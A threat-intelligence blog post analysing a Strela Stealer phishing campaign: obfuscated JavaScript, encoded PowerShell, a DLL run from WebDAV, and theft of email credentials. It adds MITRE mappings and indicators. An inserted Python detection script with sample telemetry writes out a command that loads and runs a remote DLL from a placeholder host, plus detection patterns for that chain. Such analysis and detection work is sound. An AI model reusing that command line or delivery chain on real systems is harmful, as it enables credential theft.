https://cyble.com/blog/strela-stealer-targets-europe-stealthily-via-webdav/
STRELA STEALER TARGETS CENTRAL AND SOUTHWESTERN EUROPE THROUGH STEALTHY EXECUTION VIA WEBDAV

Infostealer, Malware | October 30, 2024

Cyble analyzes Strela Stealer’s stealthy phishing campaign targeting Central and Southwestern Europe, which uses obfuscated JavaScript and WebDAV to deploy its payload and steal sensitive credentials.

KEY TAKEAWAYS

* The recent Strela Stealer phishing campaign, uncovered by Cyble Research and Intelligence Labs (CRIL), poses as an invoice notification to trick users into engaging with it.
* This campaign predominantly targets users in Central and Southwestern European regions, adjusting its focus based on locale settings to maximize its reach within specific demographics.
* Phishing emails carry ZIP file attachments containing heavily obfuscated JavaScript (.js) files, which are designed to evade detection by security tools.
* The JavaScript file conceals a base64-encoded PowerShell command that, when executed, launches a malicious payload directly from the WebDAV server without saving the file to disk.
* The payload, Strela Stealer, is embedded within an obfuscated DLL file and specifically targets systems in Germany and Spain.
* Strela Stealer is programmed to steal sensitive email configuration details, such as server information, usernames, and passwords.
* In addition to stealing credentials, Strela Stealer gathers detailed system information, enabling attackers to conduct reconnaissance and potentially launch further targeted actions on compromised systems.

EXECUTIVE SUMMARY

Strela Stealer, first identified by DCSO in late 2022, is information-stealing malware primarily designed to exfiltrate email account credentials from widely used email clients, including Microsoft Outlook and Mozilla Thunderbird. This malware initially targeted Spanish-speaking users through spam email campaigns containing malicious ISO attachments, which included a .lnk file and a polyglot file. When executed, the .lnk file triggered the polyglot file, executing both the lure HTML and the Strela Stealer DLL using “rundll32.exe”.

The Threat Actors (TAs) then evolved their tactics by using spear-phishing emails with ZIP file attachments, as identified by Palo Alto. When users downloaded and extracted the archive, a JavaScript file was saved onto their system. Executing the JavaScript file dropped a Base64-encoded file and a batch file. The Base64 file was then decoded using the “certutil -f decode” command, creating a DLL that was executed using “rundll32.exe” with the exported function “hello”.

In their latest campaign, the TAs are using spear-phishing emails with ZIP file attachments containing obfuscated JavaScript code intended to run through WScript. This JavaScript code executes a base64-encoded PowerShell command, which executes the final malicious DLL from a WebDAV server using “rundll32.exe” via the exported function “Entry”. With this method, the malicious DLL file is never written to disk, allowing it to evade detection by security products.

TECHNICAL DETAILS

The Strela Stealer campaign begins with a carefully crafted phishing email written in German, themed to resemble an invoice for a recent product purchase. The email aims to encourage recipients to open the attached ZIP file RG_175_133572_7063403.zip under the pretense of verifying or processing a transaction. The figure below shows one of the phishing emails.

Figure 1 – Phishing Email

Inside the ZIP file named “RG_175_133572_7063403.zip” is a highly obfuscated JavaScript file named “1819737872954318698.js”. This JavaScript file employs advanced obfuscation techniques, using string substitution to generate and execute its hidden code. When triggered, it runs through Windows Script Host (wscript), which then initiates a PowerShell command embedded within the script.

The PowerShell command further contains a base64-encoded payload. Once decoded and executed, this encoded command reaches out to a WebDAV server and executes a malicious DLL file named “96492217114973.dll” on the target system, allowing Strela Stealer to embed itself and begin its data-theft operations. The figure below shows the de-obfuscated JavaScript code.

Figure 2 – JavaScript File

The DLL file acts as a loader for the main payload and includes only a single export function named “Entry”. The DLL includes numerous conditional jump instructions, making analysis more challenging and potentially causing the disassembler to crash. Furthermore, several functionalities may not work properly in the debugger with default settings due to the extensive branching and conditions. The figure below shows the IDA graph view.

Figure 3 – IDA graph view

Upon execution, the DLL accesses a hardcoded key within its “.data” section, as shown in Figure 5. This key is used to decrypt additional data stored in the same section, ultimately extracting the main executable payload.

Figure 4 – Key present in DLL file

The code below demonstrates the use of XOR and other arithmetic operations for decryption.

Figure 5 – Decrypting the MZ header

The image below displays the decrypted MZ content.

Figure 6 – MZ Header

The resulting MZ file runs directly from the “rundll32.exe” process. For analysis, we extracted this payload and examined it separately, identifying it as Strela Stealer, a malware active since April 2022. Below, we compare the previous versions of Strela Stealer with the new one.

| Campaign Identified in 2022 | Campaign Identified in March 2024 | Latest Campaign |
| --- | --- | --- |
| No code obfuscation | Employed control flow obfuscation | Employed control flow obfuscation |
| No decryption of PE file from DLL file | Decrypts a memory mapped PE file | Decrypts a memory mapped PE file |
| strela, server.php, key4.db, and login.json strings present in the decrypted PE file | strela, server.php, key4.db, and login.json strings present in the decrypted PE file | Strela string is removed |
| PDB path is present | No PDB path | No PDB path |
| Export function name: Strela | Export function name: hello | Export function name: Entry |
| Drops payload from ISO | Drops payload from ZIP | Executes payload from WebDAV Server |

While Strela Stealer is running, it hides its window by calling the “ShowWindow” Win32 API with the “SW_HIDE” parameter for the current process. It then creates a thread to display a fake error message, as shown below.

Figure 7 – Fake error message

Next, the stealer obtains the locale settings from the victim’s machine by calling the GetKeyboardLayout API and comparing the result to the hardcoded language identifiers listed below.

* 0407 – German (Germany)
* 0C0A – Spanish (Spain)
* 042D – Basque (Spain)

If any of these language identifiers match, the stealer continues its execution; if not, it stops. This behavior indicates that the malware specifically targets regions within Germany and Spain.

Figure 8 – Locale Check

TARGETING THUNDERBIRD

The malware scans for Thunderbird profiles and collects the “logins.json” and “key4.db” files from all profiles found on the system. These files contain sensitive information, including usernames, passwords, and other email configuration details. Once obtained, the data within these files is encrypted using a custom encryption method with a hardcoded key, “96be98b2-8a00-410d-87da-2482cc8b7793”, and then sent to the TAs’ command and control (C&C) server at “94.159.113.48” via a POST request. Following the data transmission, the malware expects the response “ANTIROK” from the C&C server and continues to resend the encrypted data using the same encryption method until this response is received.

Figure 9 – Targeting Thunderbird profiles

TARGETING OUTLOOK

To steal Outlook information, the malware examines specific registry keys to retrieve IMAP server details, usernames, and passwords, which are typically stored in encrypted form. It accesses the following registry paths:

* Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
* Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
* SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\

Using the “CryptUnprotectData” Win32 API, it decrypts these details into plain text. After decryption, the malware applies custom encryption using the same hardcoded key as in the Thunderbird case and an XOR operation before sending the encrypted data to the threat actor’s command-and-control (C&C) server.

GATHERING SYSTEM INFORMATION

Continuing its data gathering, the malware executes the “systeminfo” command, saving the output as a text file within the Temp directory. This file is then exfiltrated to the TA’s C&C server using the previously mentioned encryption technique.

Figure 10 – Gathering systeminfo

In some cases, if the response “ANTIROK” is not received from the C&C server, the stealer attempts to re-encrypt the existing encrypted content using the same method. This results in the transmission of the actual data without encryption, as illustrated in the figure below.

Figure 11 – Data Exfiltration

In its final steps, the malware uses a COM object to navigate through the system’s “SpecialFolders” paths, collecting filenames from each directory. This data is compiled into a single output and sent to the attacker’s C2 server.
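The delivery chain described above (wscript running the .js attachment, PowerShell with a base64-encoded command, rundll32 loading the DLL from a WebDAV share through the "Entry" export) leaves a distinctive parent-child process pattern that endpoint telemetry can catch even though the DLL never touches disk. The following is an added detection example written for this article; it is not Cyble's code or part of its Threat Hunting Packages. It assumes process-creation events as simple dictionaries with `pid`, `ppid`, `image` and `cmd` fields (a stand-in for Sysmon Event ID 1 or an EDR feed), the WebDAV UNC path spellings used by the Windows WebClient service (`\\host@80\...`, `\\host@SSL@443\...`, `\\host\DavWWWRoot\...`), and a constructed sample event set in which the WebDAV server address 203.0.113.10 is a documentation placeholder, not an indicator from the article.

```python
"""Detect the Strela Stealer delivery chain in process-creation events:
wscript.exe -> powershell.exe -EncodedCommand -> rundll32.exe <WebDAV path>,Entry.
Added example for this article; event format and sample events are constructed."""
import base64
import re

# WebDAV UNC path forms produced by the Windows WebClient service (assumption: these
# are the spellings the attacker's PowerShell would hand to rundll32.exe).
WEBDAV_PATH = re.compile(
    r"\\\\[^\\\s]+(?:@SSL)?@\d+\\|\\\\[^\\\s]+\\DavWWWRoot\\", re.IGNORECASE)
# PowerShell's -EncodedCommand and its accepted abbreviations, followed by base64.
ENCODED_ARG = re.compile(
    r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
# "<path>.dll,Export" as rundll32.exe receives it.
RUNDLL32_EXPORT = re.compile(r"\.dll\s*,\s*(\w+)", re.IGNORECASE)


def image_name(event):
    """Basename of the process image, lower-cased for comparisons."""
    return event["image"].rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmd):
    """Return the plaintext of a -EncodedCommand argument, or None if absent/undecodable.
    PowerShell encodes the command as base64 over UTF-16LE, so decode in that order."""
    m = ENCODED_ARG.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def webdav_dll_execution(cmd):
    """If a rundll32 command line loads a DLL from a WebDAV path, return the export it
    invokes (or a marker when none is named); otherwise None."""
    if not WEBDAV_PATH.search(cmd):
        return None
    m = RUNDLL32_EXPORT.search(cmd)
    return m.group(1) if m else "(no export named)"


def analyze(events):
    """Return (pid, severity, description) findings for the events, correlating
    each suspicious child with its ancestry so the full chain raises the severity."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        name = image_name(e)
        if name == "powershell.exe":
            decoded = decode_encoded_command(e["cmd"])
            if decoded is not None:
                parent = by_pid.get(e["ppid"])
                scripted = parent is not None and image_name(parent) in ("wscript.exe", "cscript.exe")
                sev = "high" if scripted else "medium"
                findings.append((e["pid"], sev, "encoded PowerShell: " + decoded[:60]))
        elif name == "rundll32.exe":
            export = webdav_dll_execution(e["cmd"])
            if export is not None:
                chain, cur = [], e
                while cur is not None and len(chain) < 4:  # walk up at most four ancestors
                    chain.append(image_name(cur))
                    cur = by_pid.get(cur["ppid"])
                full_chain = "powershell.exe" in chain and "wscript.exe" in chain
                sev = "critical" if full_chain else "high"
                findings.append((e["pid"], sev,
                                 f"rundll32 loading DLL from WebDAV, export {export}; "
                                 + " <- ".join(chain)))
    return findings


# Constructed sample telemetry (not captured data). The encoded command decodes to the
# rundll32 invocation the article describes, pointed at a placeholder WebDAV host.
ENC = base64.b64encode(
    r"rundll32.exe \\203.0.113.10\DavWWWRoot\96492217114973.dll,Entry".encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\wscript.exe",
     "cmd": r'wscript.exe "C:\Users\alice\Downloads\RG_175_133572_7063403\1819737872954318698.js"'},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe -EncodedCommand " + ENC},
    {"pid": 400, "ppid": 300, "image": r"C:\Windows\System32\rundll32.exe",
     "cmd": r"rundll32.exe \\203.0.113.10\DavWWWRoot\96492217114973.dll,Entry"},
    # Benign controls: rundll32 with a local system DLL, and a PowerShell script run by path.
    {"pid": 500, "ppid": 100, "image": r"C:\Windows\System32\rundll32.exe",
     "cmd": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
    {"pid": 600, "ppid": 100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r"powershell.exe -File C:\Scripts\inventory.ps1"},
]

if __name__ == "__main__":
    for pid, sev, desc in analyze(SAMPLE_EVENTS):
        print(f"[{sev}] pid {pid}: {desc}")
```

Running the block flags only pids 300 and 400: the encoded PowerShell spawned by wscript is rated high on its own, and the rundll32 event becomes critical because its ancestry contains both powershell.exe and wscript.exe, which is the chain this campaign produces. The two benign events pass, which matters because rundll32 and PowerShell are both common in legitimate administration; the WebDAV path form and the encoded-command argument, not the process names, carry the signal.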
By gathering information on files stored in sensitive locations, the malware enables the TA to perform reconnaissance, potentially planning further data exfiltration or deploying additional malicious activities based on the obtained directory structure.

CONCLUSION

The recent iterations of the Strela Stealer campaign reveal a notable advancement in malware delivery techniques, highlighting increased sophistication and stealth. By employing spear-phishing emails that contain ZIP file attachments, the malware successfully circumvents conventional security defenses. The use of heavily obfuscated JavaScript, along with base64-encoded PowerShell commands, significantly complicates detection and response efforts. Additionally, executing the DLL file directly from the WebDAV server without saving it to disk effectively bypasses security mechanisms, enabling unauthorized access to sensitive information. This evolution underscores the importance of proactive cybersecurity measures to counter such advanced threats.

CYBLE’S THREAT HUNTING PACKAGES

At Cyble, we understand the evolving landscape of cyber threats and the need for robust security measures. Our Threat Hunting Packages are specifically designed to detect suspicious remote WebDAV share access and file execution activities, such as those employed by the Strela Stealer malware. In addition to our sophisticated detection capabilities, our Threat Hunting Packages include custom YARA rules tailored to identify signatures associated with Strela Stealer. These rules enhance the organization’s security posture by enabling quick detection of known threats, ensuring that systems remain protected against sophisticated malware tactics. For further details on this threat and several others being constantly analyzed by Cyble Research and Intelligence Labs, schedule a demo today.

RECOMMENDATIONS

* Conduct regular training sessions to educate employees about phishing tactics, including recognizing suspicious emails and attachments.
* Deploy robust endpoint protection solutions that can detect and respond to malicious activity, including obfuscated scripts and unauthorized file executions.
* Implement strict access controls on WebDAV servers, ensuring only authorized users have access. Disable WebDAV if it is not required for business operations to minimize potential attack vectors.
* Limit the execution of PowerShell scripts and other scripting languages on endpoints unless necessary for business operations.
* Develop and regularly update an incident response plan that includes specific procedures for handling phishing attacks and malware infections.
* Implement multi-factor authentication for accessing sensitive systems and accounts, adding an additional layer of security against credential theft.

MITRE ATT&CK® TECHNIQUES

| Tactic | Technique | Procedure |
| --- | --- | --- |
| Initial Access (TA0001) | Phishing (T1566) | The campaign starts with spear-phishing emails containing ZIP file attachments. |
| Execution (TA0002) | User Execution (T1203) | The obfuscated JavaScript code executes via WScript, running PowerShell commands. |
| Execution (TA0002) | Command and Scripting Interpreter (T1059) | PowerShell commands are triggered to execute the final payload. |
| Credential Access (TA0006) | Credential Dumping (T1003) | The malware retrieves usernames and passwords from Thunderbird and Outlook profiles. |
| Discovery (TA0007) | System Information Discovery (T1082) | Executes systeminfo to gather system details and save it as a text file. |
| Discovery (TA0007) | File and Directory Discovery (T1083) | Collects filenames from system directories using COM objects. |
| Command and Control (TA0011) | Application Layer Protocol (T1071) | The encrypted data is sent to the C&C server via HTTP POST requests. |
| Exfiltration (TA0010) | Exfiltration Over Command and Control Channel (T1041) | The stolen data, including login credentials, is exfiltrated to the TA’s server. |

INDICATORS OF COMPROMISE

| Indicators | Indicator Type | Description |
| --- | --- | --- |
| 13d96ed827887f6c31d907a5ee29441e2afd95be683e51e874cf5ad8207c1a98 | SHA256 | Strela Stealer |
| 1970d38e7fa45a46e792372a19d890541c87d1007ddedd53858b6df6728d72ff | SHA256 | Strela Stealer |
| dbd301f710d45acdd639cda5cd47a5453b9abb8a361ed250bfc47de70318fec6 | SHA256 | Strela Stealer |
| 13531bd403e5f8f607bf16144c38ffd94004eafa8e6a098628b915de07ba432b | SHA256 | Strela Stealer |
| 080caffde331496a46e8cb35acd107ed113046b46310747a2dd15a62efab23b5 | SHA256 | Strela Stealer |
| bd26724bdc8c5d9cb65d361231048725fbc31072d4c457c23531bc4333460011 | SHA256 | Strela Stealer |
| 77836c0b18bbfef70fd04ba674ea045bf109851efe76ae9bcc55c2dcd08cc3c5 | SHA256 | Strela Stealer |
| 03853c56bcfdf87d71ba4e17c4f6b55f989edb29fc1db2c82de3d50be99d7311 | SHA256 | Strela Stealer |
| cd39bec789b79d9ea6a642ab2ddc93121f5596de21e3b13c335ceaddb83f2083 | SHA256 | Strela Stealer |
| b9ae263904d3a5fb8471a0f8ab95fcbb224f632e6185e3a110e8d5aed9785420 | SHA256 | Strela Stealer |
| vaultdocker[.]com | Domain | Malicious |
| cloudslimit[.]com | Domain | Malicious |
| dailywebstats[.]com | Domain | Malicious |
| endpointexperiment[.]com | Domain | Malicious |
| apitestlabs[.]com | Domain | Malicious |
| 94[.]159[.]113[.]48 | IP | Malicious |

REFERENCES

https://medium.com/@DCSO_CyTec/shortandmalicious-strelastealer-aims-for-mail-credentials-a4c3e78c8abc
https://unit42.paloaltonetworks.com/strelastealer-campaign/